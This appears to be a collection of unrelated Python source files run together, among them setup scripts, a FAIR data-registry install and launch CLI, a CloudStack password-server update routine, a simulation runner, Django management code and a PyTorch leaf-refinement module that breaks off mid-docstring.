from django.apps import AppConfig
class ConnectionRequestsConfig(AppConfig):
name = 'v1.connection_requests'
|
from setuptools import find_packages, setup
with open("./README.rst") as f:
long_description = f.read()
requirements = []
setup(
name="rcv",
version="0.1.2",
description="Tabulate ballots from ranked-choice elections",
author="Max Hully",
author_email="[email protected]",
long_description=long_description,
long_description_content_type="text/x-rst",
url="https://github.com/gerrymandr/rcv",
packages=find_packages(exclude=("tests",)),
install_requires=requirements,
extras_require={
"test": ["pandas", "pytest", "pytest-cov"],
"sample": ["numpy >= 1.7"],
},
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Operating System :: OS Independent",
"License :: OSI Approved :: BSD License",
],
)
|
#!/usr/bin/env python3
import glob
import os
import pathlib
import shutil
import subprocess
import time
import typing
import venv
import click
import git
import requests
from fair.common import FAIR_FOLDER
FAIR_REGISTRY_REPO = "https://github.com/FAIRDataPipeline/data-registry.git"
def django_environ(environ: typing.Dict = os.environ):
_environ = environ.copy()
_environ["DJANGO_SETTINGS_MODULE"] = "drams.local-settings"
_environ["DJANGO_SUPERUSER_USERNAME"] = "admin"
_environ["DJANGO_SUPERUSER_PASSWORD"] = "admin"
return _environ
def rebuild_local(python: str, install_dir: str = None, silent: bool = False):
if not install_dir:
install_dir = os.path.join(
pathlib.Path.home(), FAIR_FOLDER, "registry"
)
_migration_files = glob.glob(
os.path.join(install_dir, "*", "migrations", "*.py*")
)
for mf in _migration_files:
os.remove(mf)
_db_file = os.path.join(install_dir, "db.sqlite3")
if os.path.exists(_db_file):
os.remove(_db_file)
_manage = os.path.join(install_dir, "manage.py")
_sub_cmds = [
("makemigrations", "custom_user"),
("makemigrations", "data_management"),
("migrate",),
(
"graph_models",
"data_management",
"--arrow-shape",
"crow",
"-x",
'"BaseModel,DataObject,DataObjectVersion"',
"-E",
"-o",
os.path.join(install_dir, "schema.dot"),
),
("collectstatic", "--noinput"),
("createsuperuser", "--noinput"),
]
for sub in _sub_cmds:
subprocess.check_call(
[python, _manage, *sub],
shell=False,
stdout=subprocess.DEVNULL if silent else None,
env=django_environ(),
)
if shutil.which("dot"):
subprocess.check_call(
[
shutil.which("dot"),
os.path.join(install_dir, "schema.dot"),
"-Tsvg",
"-o",
os.path.join(install_dir, "static", "images", "schema.svg"),
],
shell=False,
stdout=subprocess.DEVNULL if silent else None,
)
def install_registry(
repository: str = FAIR_REGISTRY_REPO,
head: str = "main",
install_dir: str = None,
silent: bool = False,
force: bool = False,
venv_dir: str = None,
) -> None:
if not install_dir:
install_dir = os.path.join(
pathlib.Path.home(), FAIR_FOLDER, "registry"
)
if force:
shutil.rmtree(install_dir, ignore_errors=True)
os.makedirs(os.path.dirname(install_dir), exist_ok=True)
_repo = git.Repo.clone_from(repository, install_dir)
if head not in _repo.heads:
raise FileNotFoundError(
f"No such HEAD '{head}' in registry repository"
)
else:
_repo.heads[head].checkout()
if not venv_dir:
venv_dir = os.path.join(install_dir, "venv")
venv.create(
venv_dir,
with_pip=True,
prompt="TestRegistry",
)
_venv_python = shutil.which("python", path=os.path.join(venv_dir, "bin"))
if not _venv_python:
raise FileNotFoundError(
f"Failed to find 'python' in location '{venv_dir}"
)
subprocess.check_call(
[_venv_python, "-m", "pip", "install", "--upgrade", "pip", "wheel"],
shell=False,
stdout=subprocess.DEVNULL if silent else None,
)
subprocess.check_call(
[_venv_python, "-m", "pip", "install", "whitenoise"],
shell=False,
stdout=subprocess.DEVNULL if silent else None,
)
_requirements = os.path.join(install_dir, "local-requirements.txt")
if not os.path.exists(_requirements):
raise FileNotFoundError(f"Expected file '{_requirements}'")
subprocess.check_call(
[_venv_python, "-m", "pip", "install", "-r", _requirements],
shell=False,
stdout=subprocess.DEVNULL if silent else None,
)
rebuild_local(_venv_python, install_dir, silent)
def refresh(
install_dir: str = None, silent: bool = False, venv_dir: str = None
):
if not install_dir:
install_dir = os.path.join(
pathlib.Path.home(), FAIR_FOLDER, "registry"
)
_venv_dir = venv_dir or os.path.join(install_dir, "venv")
if not os.path.exists(_venv_dir):
raise FileNotFoundError(
f"Location '{install_dir}' is not a valid registry install"
)
_venv_python = shutil.which("python", path=os.path.join(_venv_dir, "bin"))
rebuild_local(_venv_python, install_dir, silent)
def launch(
install_dir: str = None,
port: int = 8000,
silent: bool = False,
venv_dir: str = None,
):
if not install_dir:
install_dir = os.path.join(
pathlib.Path.home(), FAIR_FOLDER, "registry"
)
_venv_dir = venv_dir or os.path.join(install_dir, "venv")
if not os.path.exists(_venv_dir):
raise FileNotFoundError(
f"Location '{install_dir}' is not a valid registry install"
)
_manage = os.path.join(install_dir, "manage.py")
_venv_python = shutil.which("python", path=os.path.join(_venv_dir, "bin"))
with open(os.path.join(install_dir, "session_port.log"), "w") as out_f:
out_f.write(str(port))
with open(os.path.join(install_dir, "output.log"), "w") as out_f:
_process = subprocess.Popen(
[_venv_python, _manage, "runserver", str(port)],
stdout=out_f,
env=django_environ(),
stderr=subprocess.STDOUT,
shell=False,
)
_connection_time = 0
while _connection_time < 10:
try:
_req = requests.get(f"http://127.0.0.1:{port}/api")
break
except requests.exceptions.ConnectionError:
time.sleep(1)
_connection_time += 1
continue
if _connection_time == 10:
_log_text = open(os.path.join(install_dir, "output.log"))
raise requests.ConnectionError(f"Log reads:\n{_log_text.read()}")
if _req.status_code != 200:
raise requests.ConnectionError("Error starting local registry")
with open(os.path.join(install_dir, "token"), "w") as out_f:
subprocess.check_call(
[_venv_python, _manage, "get_token"],
stdout=out_f,
stderr=subprocess.STDOUT,
env=django_environ(),
shell=False,
)
if not os.path.exists(os.path.join(install_dir, "token")):
raise FileNotFoundError("Expected token file, but none created.")
if not silent:
click.echo(
"An access token for the REST API is available in the file"
f"'{os.path.join(install_dir, 'token')}'"
)
if not os.path.exists(os.path.join(install_dir, "token")):
raise AssertionError("Expected token file, but none created")
if not open(os.path.join(install_dir, "token")).read().strip():
raise AssertionError(
"Expected token in token file, but file empty"
)
if not shutil.which("dot") and not silent:
click.echo(
"WARNING: Graphviz is not installed, so provenance report images are not available"
)
return _process
def stop(install_dir: str = None, port: int = 8000, silent: bool = False):
if not install_dir:
install_dir = os.path.join(
pathlib.Path.home(), FAIR_FOLDER, "registry"
)
_manage = os.path.join(install_dir, "manage.py")
# "pgrep ... | xargs kill" is a shell pipeline; with shell=False the "|" and
# "xargs" would be passed to pgrep as literal arguments, so run the two steps
# explicitly instead.
_pgrep = subprocess.run(
["pgrep", "-f", f"{_manage} runserver"], capture_output=True, text=True
)
for _pid in _pgrep.stdout.split():
subprocess.check_call(["kill", _pid])
try:
requests.get(f"http://127.0.0.1:{port}/api")
raise AssertionError("Expected registry termination")
except requests.ConnectionError:
pass
@click.group()
def fair_reg():
pass
@fair_reg.command(name="launch")
@click.option(
"--directory",
default=os.path.join(pathlib.Path.home(), FAIR_FOLDER, "registry"),
help="Install location",
)
@click.option("--port", help="Port to run registry on", default=8000)
@click.option("--silent/--normal", help="Run in silent mode", default=False)
def reg_launch(directory, port, silent):
launch(directory, port, silent)
@fair_reg.command(name="stop")
@click.option(
"--directory",
default=os.path.join(pathlib.Path.home(), FAIR_FOLDER, "registry"),
help="Install location",
)
@click.option("--silent/--normal", help="Run in silent mode", default=False)
def reg_stop(directory, silent):
stop(directory, silent=silent)
@fair_reg.command(name="install")
@click.option(
"--repository",
default=FAIR_REGISTRY_REPO,
help="FAIR Data Registry Repository",
)
@click.option(
"--head",
default="main",
help="Head to use for checkout e.g. branch, tag etc.",
)
@click.option(
"--directory",
default=os.path.join(pathlib.Path.home(), FAIR_FOLDER, "registry"),
help="Install location",
)
@click.option("--silent/--normal", help="Run in debug mode", default=False)
@click.option("--force/--no-force", help="Force re-install", default=False)
def reg_install(repository, head, directory, silent, force):
if force:
force = click.confirm(
f"Are you sure you want to remove directory '{directory}'?",
default=False,
)
install_registry(repository, head, directory, silent, force)
@fair_reg.command(name="refresh")
@click.option(
"--directory",
default=os.path.join(pathlib.Path.home(), FAIR_FOLDER, "registry"),
help="Install location",
)
@click.option("--silent/--normal", help="Run in debug mode", default=False)
def reg_refresh(directory, silent):
refresh(directory, silent)
if __name__ == "__main__":
fair_reg()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import CsHelper
from CsProcess import CsProcess
from netaddr import IPNetwork, IPAddress
import logging
class CsPassword:
TOKEN_FILE="/tmp/passwdsrvrtoken"
def __init__(self, dbag):
self.dbag = dbag
self.process()
def process(self):
self.__update(self.dbag['ip_address'], self.dbag['password'])
def __update(self, vm_ip, password):
token = ""
try:
tokenFile = open(self.TOKEN_FILE)
token = tokenFile.read()
except IOError:
logging.debug("File %s does not exist" % self.TOKEN_FILE)
logging.debug("Got VM '%s' and password '%s'" % (vm_ip, password))
get_cidrs_cmd = "ip addr show | grep inet | grep -v secondary | awk '{print $2}'"
cidrs = CsHelper.execute(get_cidrs_cmd)
logging.debug("Found these CIDRs: %s" % cidrs)
for cidr in cidrs:
logging.debug("Processing CIDR '%s'" % cidr)
if IPAddress(vm_ip) in IPNetwork(cidr):
ip = cidr.split('/')[0]
logging.debug("Cidr %s matches vm ip address %s so adding passwd to passwd server at %s" % (cidr, vm_ip, ip))
proc = CsProcess(['/opt/cloud/bin/passwd_server_ip.py', ip])
if proc.find():
update_command = 'curl --header "DomU_Request: save_password" "http://{SERVER_IP}:8080/" -F "ip={VM_IP}" -F "password={PASSWORD}" ' \
'-F "token={TOKEN}" --interface 127.0.0.1 >/dev/null 2>/dev/null &'.format(SERVER_IP=ip, VM_IP=vm_ip, PASSWORD=password, TOKEN=token)
result = CsHelper.execute(update_command)
logging.debug("Update password server result ==> %s" % result)
else:
logging.debug("Update password server skipped because we didn't find a passwd server process for %s (makes sense on backup routers)" % ip)
|
from .opacities.linebyline import LineByLine
from .opacities.ck import CKTable
from .model.transmission import TransmissionRADTRANS
from .model.directimage import DirectImageRADTRANS
from .model.emission import EmissionRADTRANS |
# -*-coding:utf-8-*-
__author__ = "Allen Woo"
PLUGIN_NAME = "warehouse_plugin"
CONFIG = {
}
|
import numpy as np
# from pathos.multiprocessing import cpu_count
# from pathos.pools import ParallelPool as Pool
from multiprocessing import Pool,cpu_count
import libs.contact_inhibition_lib as lib #library for simulation routines
import libs.data as data
from structure.global_constants import *
import structure.initialisation as init
from structure.cell import Tissue, BasicSpringForceNoGrowth
import sys,os
import itertools
threshold_area_fraction = float(sys.argv[1])
death_to_birth_rate_ratio = float(sys.argv[2])
domain_size_multiplier = float(sys.argv[3])
b = float(sys.argv[4])
job_id = sys.argv[5]
NUMBER_SIMS = 10000
BATCH_SIZE = 1000
DELTA = 0.025
L = 10 # population size N=l*l
TIMEND = 80000. # simulation time (hours)
MAX_POP_SIZE = 1000
TIMESTEP = 96. # time intervals to save simulation history
DEATH_RATE = 0.25/24.
INIT_TIME = 96.
PARENTDIR = "CIP_pd_fix_N100/db%.2f_a%.1f/"%(death_to_birth_rate_ratio,threshold_area_fraction)
if not os.path.exists(PARENTDIR): # if the outdir doesn't exist create it
os.makedirs(PARENTDIR)
game_constants = (b,1.)
game = lib.prisoners_dilemma_averaged
simulation = lib.simulation_contact_inhibition_area_dependent
rates = (DEATH_RATE,DEATH_RATE/death_to_birth_rate_ratio)
with open(PARENTDIR+'info',"w") as f:
f.write('death_rate = %.6f\n'%DEATH_RATE)
f.write('initial pop size = %3d\n'%(L*L))
f.write('domain width = %.1f\n'%(L*domain_size_multiplier))
f.write('quiescent area ratio = %.1f'%threshold_area_fraction)
f.write('death to birth rate ratio = %.2f'%death_to_birth_rate_ratio)
f.write('timestep = %.1f'%TIMESTEP)
def fixed(history,i):
if 0 not in history[-1].properties['type']:
fix = 1
elif 1 not in history[-1].properties['type']:
fix = 0
else:
fix = -1
data.save_N_mutant(history,PARENTDIR+'/incomplete_b%.1f'%b,i)
return fix
def run_single_unpack(args):
return run_single(*args)
def run_single(i):
"""run a single voronoi tessellation model simulation"""
sys.stdout.flush()
rand = np.random.RandomState()
history = lib.run_simulation(simulation,L,TIMESTEP,TIMEND,rand,progress_on=False,
init_time=INIT_TIME,til_fix=True,save_areas=True,
return_events=False,save_cell_histories=False,N_limit=MAX_POP_SIZE,DELTA=DELTA,game=game,game_constants=game_constants,mutant_num=1,
domain_size_multiplier=domain_size_multiplier,rates=rates,threshold_area_fraction=threshold_area_fraction)
fixation = fixed(history,i)
with open(PARENTDIR+'b%.2f_%s_time'%(b,job_id),'a') as wfile:
wfile.write('%5d %5d %d\n'%(i,history[-1].time,fixation))
return fixation
def run_parallel():
pool = Pool(cpu_count()-1,maxtasksperchild=1000)
fixation = np.array([f for f in pool.imap(run_single,range(NUMBER_SIMS))])
with open(PARENTDIR+'b%.2f_%s'%(b,job_id),'w') as wfile:
if NUMBER_SIMS%BATCH_SIZE != 0:
batch_size=1
else:
batch_size = BATCH_SIZE
fixation = fixation.reshape((NUMBER_SIMS//batch_size,batch_size))  # integer division so reshape receives ints
for fixation_batch in fixation:
fixed = len(np.where(fixation_batch==1)[0])
lost = len(np.where(fixation_batch==0)[0])
incomplete = len(np.where(fixation_batch==-1)[0])
wfile.write('%d %d %d\n'%(fixed,lost,incomplete))
run_parallel()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import codecs
import os
import re
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Get the version
version_regex = r'__version__ = ["\']([^"\']*)["\']'
with open('h2/__init__.py', 'r') as f:
text = f.read()
match = re.search(version_regex, text)
if match:
version = match.group(1)
else:
raise RuntimeError("No version number found!")
# Stealing this from Kenneth Reitz
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
packages = [
'h2',
]
readme = codecs.open('README.rst', encoding='utf-8').read()
history = codecs.open('HISTORY.rst', encoding='utf-8').read()
setup(
name='h2',
version=version,
description='HTTP/2 State-Machine based protocol implementation',
long_description=u'\n\n'.join([readme, history]),
author='Cory Benfield',
author_email='[email protected]',
url='http://hyper.rtfd.org',
packages=packages,
package_data={'': ['LICENSE', 'README.rst', 'CONTRIBUTORS.rst', 'HISTORY.rst', 'NOTICES']},
package_dir={'h2': 'h2'},
include_package_data=True,
license='MIT License',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
],
install_requires=[
'hyperframe>=5.1.0, <6',
'hpack>=2.3,<4',
],
extras_require={
':python_version == "2.7" or python_version == "3.3"': ['enum34>=1.1.6, <2'],
}
)
|
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.core.mail import EmailMessage
from django.db.models import Q
from django.core.exceptions import ObjectDoesNotExist
from pettycash.models import PettycashBalanceCache, PettycashTransaction
from members.models import User
from moneyed import Money, EUR
import sys, os
import datetime
class Command(BaseCommand):
help = "Recache all balances"
def add_arguments(self, parser):
parser.add_argument(
"--dry-run",
action="store_true",
dest="dryrun",
help="Do a dry-run; do not actually save.",
)
def handle(self, *args, **options):
rc = 0
verbosity = int(options["verbosity"])
for user in User.objects.all():
balance = PettycashBalanceCache(owner=user, balance=Money(0, EUR))
old_balance = Money(0, EUR)
act = "correction"
try:
balance = PettycashBalanceCache.objects.get(owner=user)
old_balance = balance.balance
except ObjectDoesNotExist as e:
act = "initial creation"
pass
balance.balance = Money(0, EUR)
trns = []
try:
trns = PettycashTransaction.objects.all().filter(
Q(dst=user) | Q(src=user)
)
for tx in trns:
if tx.dst == user:
balance.balance += tx.amount
else:
balance.balance -= tx.amount
except ObjectDoesNotExist as e:
pass
old_balance = old_balance - balance.balance
err = ""
if old_balance != Money(0, EUR) or act == "initial creation":
err = " (%s: %s)" % (act, old_balance)
if not options["dryrun"]:
balance._change_reason = act
balance.save()
if (err != "" and act != "initial creation") or verbosity > 1:
print("%s: %s%s" % (user, balance.balance, err))
sys.exit(rc)
|
__all__ = ['logger', 'testoptions', 'testutil']
# fix import paths first so that the right (dev) version of pygr is imported
import pathfix
# import rest of test utils.
import testoptions
import testutil
# make SkipTest available
from unittest_extensions import SkipTest, PygrTestProgram
|
DEFAULT_INTERVAL = 3600 # 1 hour
|
import numpy as np
import csv
import logging
logger = logging.getLogger(__name__)
### generate submission.csv
def output_submission(path,playlist,rec_uris,Warn=True):
pid = playlist['pid']
num_recs = len(rec_uris)
if Warn and (num_recs != 500):
logger.warning("Playlist {0} got {1}/500 recs.".format(pid,num_recs))
with open(path+"submission.csv",'a') as submission:
sub_wrtr = csv.writer(submission, delimiter=',')
sub_wrtr.writerow([pid] + rec_uris)
### generate extra_info.csv with more information
def output_extra(path,playlist,rec_uris,t2a,u2t,u2a,perf_stats,
for_test_set=False,stats_only=False):
with open(path+"perf_stats.csv",'a') as perf:
perf_wrtr = csv.writer(perf, delimiter=';')
perf_wrtr.writerow([playlist['pid'],str(perf_stats)])
if stats_only: return
pid = playlist['pid']
try: name = playlist['name']
except KeyError: name = 'N/A'
num_seeds = playlist['num_samples']
num_anss = playlist['num_tracks'] - num_seeds
with open(path+"{0}.csv".format(pid),'w') as extra:
# Write basic info
extra_wrtr = csv.writer(extra, delimiter=',')
extra_wrtr.writerow(["------------------------------"])
extra_wrtr.writerow([str(pid), name.encode('utf-8')])
if for_test_set:
extra_wrtr.writerow(['perf_stats:',str(perf_stats)])
# Write seeds
extra_wrtr.writerow(["--------------------"])
extra_wrtr.writerow(["Seeds: ({0})".format(num_seeds)])
for track in playlist['tracks']:
track_name = track['track_name'].encode('utf-8')
artist_name = track['artist_name'].encode('utf-8')
extra_wrtr.writerow([track_name, artist_name])
# Write answers (test_set only)
if for_test_set:
extra_wrtr.writerow(["--------------------"])
extra_wrtr.writerow(["Answers: ({0})".format(num_anss)])
for track in playlist['answers']:
track_name = track['track_name'].encode('utf-8')
artist_name = track['artist_name'].encode('utf-8')
extra_wrtr.writerow([track_name, artist_name])
# Write recommendations
extra_wrtr.writerow(["--------------------"])
extra_wrtr.writerow(["Recommendations: ({0})".format(len(rec_uris))])
rec_a_uris = [ t2a[t_uri] for t_uri in rec_uris ]
for track_uri, artist_uri in zip(rec_uris, rec_a_uris):
track_name = u2t[track_uri].encode('utf-8')
artist_name = u2a[artist_uri].encode('utf-8')
extra_wrtr.writerow([track_name, artist_name])
extra_wrtr.writerow(["End of playlist {0}".format(pid)])
extra_wrtr.writerow(["------------------------------"])
|
from multiprocessing.sharedctypes import Value
import numpy as np
import pandas as pd
from sklearn.metrics import accuracy_score
from tqdm import tqdm
from fastinference.models import Ensemble, Tree
import torch
import torch.nn as nn
def create_mini_batches(inputs, targets, batch_size, shuffle=False):
""" Create an mini-batch like iterator for the given inputs / target / data. Shamelessly copied from https://stackoverflow.com/questions/38157972/how-to-implement-mini-batch-gradient-descent-in-python
Parameters
----------
inputs : array-like vector or matrix
The inputs to be iterated in mini batches
targets : array-like vector or matrix
The targets to be iterated in mini batches
batch_size : int
The mini batch size
shuffle : bool, default False
If True shuffle the batches
"""
assert inputs.shape[0] == targets.shape[0]
indices = np.arange(inputs.shape[0])
if shuffle:
np.random.shuffle(indices)
start_idx = 0
while start_idx < len(indices):
if start_idx + batch_size > len(indices) - 1:
excerpt = indices[start_idx:]
else:
excerpt = indices[start_idx:start_idx + batch_size]
start_idx += batch_size
yield inputs[excerpt], targets[excerpt]
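# A minimal usage sketch (an illustration only; `X_train` and `y_train` are
# hypothetical numpy arrays of shape (N, d) and (N,)):
#
#   for x_batch, y_batch in create_mini_batches(X_train, y_train, batch_size=32, shuffle=True):
#       ...  # one optimization step per mini-batch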
def apply(tree, mapping, X):
"""Applies the given tree to the given data by using the provided leaf-node mapping. To do so traverse the tree as usual and extracts the relevant leaf node indices
Args:
tree (Tree): The tree that should be applied
mapping (dict): The mapping of leaf node indices (e.g. node.id) and their counterpart in the leaf array used by SGD
X (2d np.array): The data matrix
Returns:
np.array: (N,) numpy array with the leaf index for each data item
"""
if len(X.shape) == 1:
X = X.reshape(1,X.shape[0])
ids = []
for x in X:
node = tree.head
while(node.prediction is None):
if (x[node.feature] <= node.split):
node = node.leftChild
else:
node = node.rightChild
ids.append(mapping[node.id])
return np.array(ids)
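# A minimal usage sketch (an illustration only; `some_tree`, `mapping` and
# `leafs` are hypothetical and built as in LeafRefinery.refine below, where
# `mapping` maps node.id to a row of the per-tree leaf array):
#
#   leaf_idx = apply(some_tree, mapping, X)   # (N,) leaf row index per sample
#   leaf_preds = leafs[leaf_idx, :]           # gather the per-leaf predictions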
class LeafRefinery(nn.Module):
def __init__(self, epochs, lr, batch_size, optimizer, verbose,loss_function = "mse", loss_type = "upper", l_reg = 1.0):
super().__init__()
assert loss_function in ["mse", "nll", "cross-entropy"], "LeafRefinery only supports the {{mse, nll, cross-entropy}} loss but you gave {}".format(loss_function)
assert lr >= 0, "Learning rate must be positive, but you gave {}".format(lr)
assert epochs >= 1, "Number of epochs must be >= 1, but you gave {}".format(epochs)
assert optimizer in ["sgd", "adam"], "The optimizer must be from {{adam, sgd}}, but you gave {}".format(optimizer)
if loss_type == "exact":
assert 0 <= l_reg <= 1, "You set loss_type to exact. In this case l_reg should be from [0,1], but you supplied l_reg = {}".format(l_reg)
self.epochs = epochs
self.lr = lr
self.batch_size = batch_size
self.optimizer = optimizer
self.verbose = verbose
self.loss_function = loss_function
self.loss_type = loss_type
self.l_reg = l_reg
def _loss(self, pred, target):
if self.loss_function == "mse":
target_one_hot = torch.nn.functional.one_hot(target, num_classes = pred.shape[1]).double()
return torch.nn.functional.mse_loss(pred, target_one_hot)
elif self.loss_function == "nll":
return torch.nn.functional.nll_loss(pred, target)
elif self.loss_function == "cross-entropy":
return torch.nn.functional.cross_entropy(pred, target)
else:
raise ValueError("Unknown loss function set in LeafRefinery")
def compute_loss(self, fbar, base_preds, target):
if self.loss_type == "upper":
n_classes = fbar.shape[1]
n_preds = fbar.shape[0]
D = torch.eye(n_classes).repeat(n_preds, 1, 1).double()
else:
if self.loss_function == "mse":
n_classes = fbar.shape[1]
n_preds = fbar.shape[0]
eye_matrix = torch.eye(n_classes).repeat(n_preds, 1, 1).double()
D = 2.0*eye_matrix
elif self.loss_function == "nll":
n_classes = fbar.shape[1]
n_preds = fbar.shape[0]
D = torch.eye(n_classes).repeat(n_preds, 1, 1).double()
target_one_hot = torch.nn.functional.one_hot(target, num_classes = n_classes)
eps = 1e-7
diag_vector = target_one_hot*(1.0/(fbar**2+eps))
D.diagonal(dim1=-2, dim2=-1).copy_(diag_vector)
elif self.loss_function == "cross-entropy":
n_preds = fbar.shape[0]
n_classes = fbar.shape[1]
f_bar_softmax = nn.functional.softmax(fbar,dim=1)
D = -1.0*torch.bmm(f_bar_softmax.unsqueeze(2), f_bar_softmax.unsqueeze(1)).double()
diag_vector = f_bar_softmax*(1.0-f_bar_softmax)
D.diagonal(dim1=-2, dim2=-1).copy_(diag_vector)
else:
# NOTE: We should never reach this code path
raise ValueError("Invalid combination of mode and loss function in Leaf-refinement.")
f_loss = self._loss(fbar, target)
losses = []
n_estimators = len(base_preds)
for pred in base_preds:
diff = pred - fbar
covar = torch.bmm(diff.unsqueeze(1), torch.bmm(D, diff.unsqueeze(2))).squeeze()
div = 1.0/n_estimators * 1.0/2.0 * covar
i_loss = self._loss(pred, target)
if self.loss_type == "exact":
# Eq. (4)
reg_loss = 1.0/n_estimators * i_loss - self.l_reg * div
else:
# Eq. (5) where we scale the ensemble loss with 1.0/self.n_estimators due to the summation later
reg_loss = 1.0/n_estimators * self.l_reg * f_loss + (1.0 - self.l_reg)/n_estimators * i_loss
losses.append(reg_loss)
return torch.stack(losses).sum()
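# Reading aid (not part of the original code): for M = n_estimators trees,
# loss_type == "upper" optimizes, per tree i,
#   l_reg/M * L(fbar, y) + (1 - l_reg)/M * L(f_i, y)               (Eq. (5))
# i.e. a convex mix of the ensemble loss and the individual tree losses, while
# loss_type == "exact" optimizes
#   1/M * L(f_i, y) - l_reg/(2M) * (f_i - fbar)^T D (f_i - fbar)   (Eq. (4))
# where D carries second-derivative information of the chosen loss at fbar
# (2*I for mse, and the diagonal / softmax-based terms for nll and
# cross-entropy, as constructed above).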
def refine(self, weights, trees, X, Y):
"""Performs SGD using the MSE loss over the leaf nodes of the given trees on the given data. The weights of each tree are respected during optimization but not optimized.
Args:
weights (np.array): The weights of the trees.
trees (list of Tree): The trees.
X (2d np.array): The data.
Y (np.array): The target.
epochs (int): The number of epochs SGD is performed.
lr (float): The learning rate of SGD.
batch_size (int): The batch size of SGD
optimizer (str): The optimizer used for optimization. Can be {{"sgd", "adam"}}.
verbose (bool): If True outputs the loss during optimization.
Returns:
list of trees: The refined trees.
"""
if self.batch_size > X.shape[0]:
if self.verbose:
print("WARNING: The batch size for SGD is larger than the dataset supplied: batch_size = {} > X.shape[0] = {}. Using batch_size = X.shape[0]".format(self.batch_size, X.shape[0]))
self.batch_size = X.shape[0]
# To make the following SGD somewhat efficient this code extracts all the leaf nodes and gathers them in an array. To do so it iterates over all trees and all nodes in the trees. Each leaf node is added to the leafs array and the corresponding node.id is stored in mappings. For scikit-learn trees this would be much simpler as they already offer a dedicated leaf field:
# leafs = []
# for tree in trees:
# tmp = tree.tree_.value / tree.tree_.value.sum(axis=(1,2))[:,np.newaxis,np.newaxis]
# leafs.append(tmp.squeeze(1))
mappings = []
leafs = []
for t, w in zip(trees, weights):
leaf_mapping = {}
l = []
for i, n in enumerate(t.nodes):
if n.prediction is not None:
leaf_mapping[n.id] = len(l)
# Normalize the values in the leaf nodes for SGD. This is usually a better initialization
pred = np.array(n.prediction) / sum(n.prediction)
l.append(pred)
mappings.append(leaf_mapping)
leafs.append(np.array(l))
self.leafs = nn.ParameterList([ nn.Parameter(torch.from_numpy(l)) for l in leafs])
# Train the model
if self.optimizer == "adam":
optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)
else:
optimizer = torch.optim.SGD(self.parameters(), lr=self.lr)
for epoch in range(self.epochs):
mini_batches = create_mini_batches(X, Y, self.batch_size, True)
batch_cnt = 0
loss_sum = 0
accuracy_sum = 0
with tqdm(total=X.shape[0], ncols=150, disable = not self.verbose) as pbar:
for x,y in mini_batches:
# Prepare the target and apply all trees
indices = [apply(t, m, x) for t,m in zip(trees, mappings)]
pred = []
for i, idx, w in zip(range(len(trees)), indices, weights):
pred.append(w * self.leafs[i][idx,:])
fbar = torch.stack(pred).mean(axis=0)
# Do the actual optimization
loss = self.compute_loss(fbar, pred, torch.tensor(y))
optimizer.zero_grad()
loss.backward()
optimizer.step()
# compute some statistics
loss_sum += loss.detach().numpy()
accuracy_sum += accuracy_score(fbar.argmax(axis=1),y) * 100.0
batch_cnt += 1
pbar.update(x.shape[0])
desc = '[{}/{}] loss {:2.4f} accuracy {:2.4f}'.format(
epoch,
self.epochs-1,
loss_sum / batch_cnt,
accuracy_sum / batch_cnt,
)
pbar.set_description(desc)
# Copy the optimized leafs back into the trees with the pre-computed mapping
for t, m, l in zip(trees, mappings, self.leafs):
for nid, i in m.items():
t.nodes[nid].prediction = l[i].detach().numpy().tolist()
return trees
def optimize(model, X = None, Y = None, file = "", epochs = 5, lr = 1e-1, batch_size = 32, optimizer = "adam", verbose = False, loss_function = "mse", loss_type = "upper", l_reg = 1.0, **kwargs):
"""Performs leaf refinement in the given tree ensemble with PyTorch. Leaf-refinement refines the probability estimates in the leaf nodes of each tree by optimizing the NCL loss function using SGD. This implementation uses PyTorch to compute the gradient of the loss function and is thereby a little more flexible. Its main purpose is to facilitate easy development of new refinement methods.
For refinement either :code:`X` / :code:`Y` must be provided or :code:`file` must point to a CSV file which has a "y" column. All remaining columns are interpreted as features. If both are provided then :code:`X` / :code:`Y` is used before the file. If none are provided an error is thrown.
You can activate this optimization by simply passing :code:`"leaf-refinement-pytorch"` to the optimizer, e.g.
.. code-block::
loaded_model = fastinference.Loader.model_from_file("/my/nice/tree.json")
loaded_model.optimize("leaf-refinement", {"X": some_data, "Y" : some_targets})
Reference:
Buschjäger, Sebastian, and Morik, Katharina "There is no Double-Descent in Random Forests" 2021 (https://arxiv.org/abs/2111.04409)
Buschjäger, Sebastian, Pfahler, Lukas, and Morik, Katharina "Generalized Negative Correlation Learning for Deep Ensembling" 2020 (https://arxiv.org/pdf/2011.02952.pdf)
Args:
model (Ensemble of Trees or Tree): The Tree or Ensemble of Trees that should be refined
X (2d np.array, optional): A (N,d) data matrix used for refinement. Defaults to None.
Y (np.array, optional): A (N,) target vector used for refinement. Defaults to None.
file (str, optional): Path to a CSV file from which X/Y is loaded if these are not provided. If set, the CSV must contain a "y" column to properly load Y. All remaining columns are interpreted as features. Defaults to "".
epochs (int, optional): Number of epochs used for SGD/ADAM. Defaults to 5.
lr (float, optional): Learning rate used for SGD/ADAM. Defaults to 1e-1.
batch_size (int, optional): Batch size used for SGD/ADAM. Defaults to 32.
optimizer (str, optional): Optimizer for optimization. Can be {{"sgd", "adam"}}. Defaults to "adam".
verbose (bool, optional): If True outputs the loss during optimization. Defaults to False.
